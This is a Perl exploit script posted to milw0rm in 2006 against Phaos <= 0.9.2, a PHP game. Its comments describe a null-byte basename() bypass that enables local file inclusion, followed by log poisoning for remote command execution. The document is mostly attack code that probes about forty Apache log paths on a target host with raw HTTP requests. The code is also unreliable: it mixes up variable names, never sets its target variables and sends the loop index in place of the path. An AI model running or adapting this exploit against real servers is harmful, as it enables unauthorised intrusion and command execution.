#!/usr/bin/perl use IO::Socket; use LWP::Simple; #/* #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- - - [DEVIL TEAM THE BEST POLISH TEAM] - - #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Phaos <= 0.9.2 basename() Remote Command Execution Exploit #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- [Script name: Phaos v. 0.9.2 #- [Script site: http://sourceforge.net/projects/phaosrpg/ #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Find by: Kacper (a.k.a Rahim) #+ #- Contact: kacper1964@yahoo.pl #- or #- http://www.devilteam.yum.pl/ #- and #- http://www.rahim.webd.pl/ #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Special Greetz: DragonHeart ;-) #- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi #- #!@ Przyjazni nie da sie zamienic na marne korzysci @! #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Z Dedykacja dla osoby, #- bez ktorej nie mogl bym zyc... #- K.C:* J.M (a.k.a Magaja) #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #*/ #/* #vulnerable code include_lang.php <_ line: 2-3: #..... # @include ("lang/en.php"); # @include ("lang/".basename($lang).".php"); #..... #this check can be bypassed by supplying a well crafted value for lang argument: # #../../../../../../../apache/logs/access.log[null char]/eng # #basename() returns 'eng' and eng.php is an existing file in lang/ folder # #../../../../../../../apache/logs/access.log[null char] #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #shop_include.php line 5: #... #include_once ("lang/".$lang.".php"); #... #u can include an arbitrary file from local resources #possible locations: #../../../../../var/log/httpd/access_log #../../../../../var/log/httpd/error_log #../apache/logs/error.log #../apache/logs/access.log #../../apache/logs/error.log #../../apache/logs/access.log #../../../apache/logs/error.log #../../../apache/logs/access.log #../../../../apache/logs/error.log #../../../../apache/logs/access.log #../../../../../apache/logs/error.log #../../../../../apache/logs/access.log #../logs/error.log #../logs/access.log #../../logs/error.log #../../logs/access.log #../../../logs/error.log #../../../logs/access.log #../../../../logs/error.log #../../../../logs/access.log #../../../../../logs/error.log #../../../../../logs/access.log #../../../../../etc/httpd/logs/access_log #../../../../../etc/httpd/logs/access.log #../../../../../etc/httpd/logs/error_log #../../../../../etc/httpd/logs/error.log #../../../../../var/www/logs/access_log #../../../../../var/www/logs/access.log #../../../../../usr/local/apache/logs/access_log #../../../../../usr/local/apache/logs/access.log #../../../../../var/log/apache/access_log #../../../../../var/log/apache/access.log #../../../../../var/log/access_log #../../../../../var/www/logs/error_log #../../../../../var/www/logs/error.log #../../../../../usr/local/apache/logs/error_log #../../../../../usr/local/apache/logs/error.log #../../../../../var/log/apache/error_log #../../../../../var/log/apache/error.log #../../../../../var/log/access_log #../../../../../var/log/error_log #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #*/ print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; print "+ - - [DEVIL TEAM THE BEST POLISH TEAM] - - +\n"; print "+ Phaos <= 0.9.2 basename() Remote Command Execution Exploit +\n"; print "+ http://www.rahim.webd.pl/ +\n"; print "+ Find by: Kacper (a.k.a Rahim) +\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; if (@ARGV < 2) { print "[*] Uzycie/Usage: phaos.pl [host] [path/folder]\n\n"; exit(); } @paths=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../../../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); for ($i=0; $i<=$#paths; $i++) { print "Path : ".$i."\n"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$server, Timeout => 10, PeerPort=>"http(80)") || die "nie mozna sie polaczyc z hostem/cannot connect to host :( \n"; print $socket "GET ".$path."include_lang.php&lang=".$i."%00/en HTTP/1.1\r\n"; print $socket "Host: ".$serv."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; $out = ""; while ($answer = <$sock>) { $out.=$answer; } close($sock); if ($out =~ m/_exppl_(.*?)_exppl_/ms) { print "[+] Log File found ! [ $i ] \n\n"; $log = $i; $i = $#path } } #Pozdro dla wszystkich ;-) # milw0rm.com [2006-08-24]